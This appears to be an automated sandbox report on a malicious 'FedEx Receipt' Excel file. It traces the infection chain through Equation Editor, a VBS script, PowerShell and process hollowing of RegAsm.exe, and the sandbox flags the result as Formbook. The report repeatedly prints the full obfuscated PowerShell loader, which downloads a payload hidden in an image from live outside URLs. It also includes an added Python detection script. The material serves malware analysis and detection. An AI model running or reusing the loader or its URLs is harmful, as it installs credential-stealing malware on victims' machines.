Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_0238FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02390078 NtResumeThread, 12_2_02390078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02390060 NtQuerySection, 12_2_02390060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02390048 NtProtectVirtualMemory, 12_2_02390048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023900C4 NtCreateFile, 12_2_023900C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0239010C NtOpenDirectoryObject, 12_2_0239010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023901D4 NtSetValueKey, 12_2_023901D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02390C40 NtGetContextThread, 12_2_02390C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_023910D0 NtOpenProcessToken, 12_2_023910D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02391148 NtOpenThread, 12_2_02391148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FA20 NtQueryInformationFile, 12_2_0238FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FA50 NtEnumerateValueKey, 12_2_0238FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FAB8 NtQueryValueKey, 12_2_0238FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FAD0 NtAllocateVirtualMemory, 12_2_0238FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FB50 NtCreateKey, 12_2_0238FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FBB8 NtQueryInformationToken, 12_2_0238FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FBE8 NtQueryVirtualMemory, 12_2_0238FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238F8CC NtWaitForSingleObject, 12_2_0238F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238F938 NtWriteFile, 12_2_0238F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02391930 NtSetContextThread, 12_2_02391930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238F900 NtReadFile, 12_2_0238F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FE24 NtWriteVirtualMemory, 12_2_0238FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FEA0 NtReadVirtualMemory, 12_2_0238FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FED0 NtAdjustPrivilegesToken, 12_2_0238FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FF34 NtQueueApcThread, 12_2_0238FF34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FFB4 NtCreateSection, 12_2_0238FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FFFC NtCreateProcessEx, 12_2_0238FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FC30 NtOpenProcess, 12_2_0238FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FC60 NtMapViewOfSection, 12_2_0238FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FC48 NtSetInformationFile, 12_2_0238FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FC90 NtUnmapViewOfSection, 12_2_0238FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FD5C NtEnumerateKey, 12_2_0238FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0238FD8C NtDelayExecution, 12_2_0238FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_02391D80 NtSuspendThread, 12_2_02391D80
Source: FedEx Receipt_53065724643.xls OLE indicator, VBA macros: true
Source: FedEx Receipt_53065724643.xls Stream path 'MBD00023D36/\x1Ole' : http://ilang.in/BrlcBqA?IO15WZTK0N3T~JY?{q.q^HoV-Q|~Hus:s9Mqf~! k,!Z2X0bL1G9lUmbGuDxB7Jknx6ld8yukv9gO2F4wq2dpLfgSZkjmdSe3mNwyo5hlDmOqb8qNiZOkn1sSec7bIIzBKjmwZIjBbFTsaup1blbV1ZGEYDD9EuRnW4XpZSQkw7SwjLXoXIOtT3j5UX0orbK2JyT8ps\e#Io_Gj]}
Source: ~DFE1D622D06AD63FEF.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF5C7C8EE0310B7690.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp.4.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0239E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0240F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 023E3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 023E373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0239DF5C appears 137 times
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@11/41@9/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0GD6N06.txt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8313.tmp
Source: FedEx Receipt_53065724643.xls OLE indicator, Workbook stream: true
Source: B9930000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: FedEx Receipt_53065724643.xls Virustotal: Detection: 29%
Source: FedEx Receipt_53065724643.xls ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown
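The process chain recorded above (EXCEL.EXE to WINWORD.EXE to EQNEDT32.EXE to wscript.exe to powershell.exe to RegAsm.exe) is what the Sigma rules listed in this report key on. As an added example, not part of the report or of the Sigma project, the Python below runs simplified versions of those checks over a constructed Sysmon-style event list modelled on this tree. The rule logic paraphrases the Sigma titles rather than the published rule bodies, and everything in the fixture except powershell's PID 3688 and the image paths (the other PIDs, the RFC 5737 destination IPs, the abbreviated command lines) is made up.

```python
import ipaddress

# Constructed Sysmon-style fixture modelled on the process tree in this report.
# PIDs other than powershell's 3688, the destination IPs (RFC 5737 documentation
# ranges) and the abbreviated command lines are made up for the example.
EVENTS = [
    {"type": "process_create", "pid": 2200, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" /automation -Embedding'},
    {"type": "process_create", "pid": 2400, "ppid": 2200,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" -Embedding'},
    {"type": "process_create", "pid": 2600, "ppid": 2400,
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": '"EQNEDT32.EXE" -Embedding'},
    {"type": "network_connect", "pid": 2600, "dest_ip": "198.51.100.7", "dest_port": 80},
    {"type": "process_create", "pid": 2800, "ppid": 2600,
     "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"'},
    {"type": "process_create", "pid": 3688, "ppid": 2800,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     # abbreviated from the command line recorded in this report
     "cmdline": ("powershell.exe -Command \"('PvLlink = tA4https://uploaddeimagens.com.br/...tA4'"
                 "+'...FromBase64String(PvLbase64Command)...(tA4txt.JNNB/77088/61.532.59.32//:ptthtA4...')"
                 ".rePLACe(([cHar]80+[cHar]118+[cHar]76),'$')| IEx\"")},
    {"type": "network_connect", "pid": 3688, "dest_ip": "203.0.113.10", "dest_port": 443},
    {"type": "process_create", "pid": 3900, "ppid": 3688,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": '"RegAsm.exe"'},
    # benign control: an interactive PowerShell listing files and talking to an internal share
    {"type": "process_create", "pid": 4100, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"type": "network_connect", "pid": 4100, "dest_ip": "10.0.0.5", "dest_port": 445},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
SCRIPT_CHILDREN = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe",
                   "regsvr32.exe", "rundll32.exe", "certutil.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
# explicit list instead of ipaddress.is_private, which also treats the RFC 5737 test ranges as private
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def is_local(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def index_processes(events):
    return {e["pid"]: e for e in events if e["type"] == "process_create"}


def ancestry(events, pid):
    """Image names from the root of the recorded tree down to `pid`."""
    procs, chain = index_processes(events), []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain[::-1]


def detect(events):
    """Return (rule name, pid) pairs; rule names follow the Sigma titles in this report."""
    procs, alerts = index_processes(events), []
    for e in events:
        if e["type"] == "process_create":
            child, parent = basename(e["image"]), procs.get(e["ppid"])
            if parent and basename(parent["image"]) in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
                alerts.append(("Suspicious Microsoft Office Child Process", e["pid"]))
            if child == "powershell.exe":
                cl = e["cmdline"].lower()
                if "frombase64string" in cl:
                    alerts.append(("PowerShell Base64 Encoded FromBase64String Cmdlet", e["pid"]))
                if "[char]" in cl and ".replace(" in cl and "iex" in cl:
                    alerts.append(("Potential PowerShell Command Line Obfuscation", e["pid"]))
                if any(rev in cl for rev in ("ptth", "xei", "gnirts")):  # http, iex, string reversed
                    alerts.append(("Potential PowerShell Obfuscation Via Reversed Commands", e["pid"]))
        elif e["type"] == "network_connect":
            src = procs.get(e["pid"])
            if src is None:
                continue
            image = basename(src["image"])
            if image == "eqnedt32.exe":
                alerts.append(("Equation Editor Network Connection", e["pid"]))
            if image in SCRIPT_HOSTS and not is_local(e["dest_ip"]):
                alerts.append(("Script Initiated Connection to Non-Local Network", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}, chain {' -> '.join(ancestry(EVENTS, pid))}")
```

The second powershell process (the control, PID 4100) trips none of the rules because its parent is not an Office binary, its command line carries none of the obfuscation markers, and its only connection stays inside 10.0.0.0/8; the one from the report fires on parent, command line and destination independently, which is what makes the chain robust to any single evasion.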
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll, wow64cpu.dll, msi.dll, cryptsp.dll, rpcrtremote.dll, dwmapi.dll, version.dll, secur32.dll, winhttp.dll, webio.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, nlaapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, rasadhlp.dll, propsys.dll, ntmarta.dll, apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll, wow64cpu.dll, version.dll, sxs.dll, dwmapi.dll, cryptsp.dll, msisip.dll, bcrypt.dll, rpcrtremote.dll, winhttp.dll, webio.dll, credssp.dll, dnsapi.dll, mpr.dll, scrrun.dll, propsys.dll, apphelp.dll, ntmarta.dll, secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll, wow64cpu.dll, atl.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, msisip.dll, amsi.dll, secur32.dll, rpcrtremote.dll, amsi.dll, bcrypt.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, webio.dll, credssp.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, rasadhlp.dll, ncrypt.dll, gpapi.dll, amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll, wow64cpu.dll, uxtheme.dll, winmm.dll, samcli.dll, msacm32.dll, version.dll, sfc.dll, sfc_os.dll, dwmapi.dll, mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp
Source: ~DFE1D622D06AD63FEF.TMP.0.dr Initial sample: OLE indicators vbamacros = False
Source: FedEx Receipt_53065724643.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation

Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs .Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs .Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs .Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
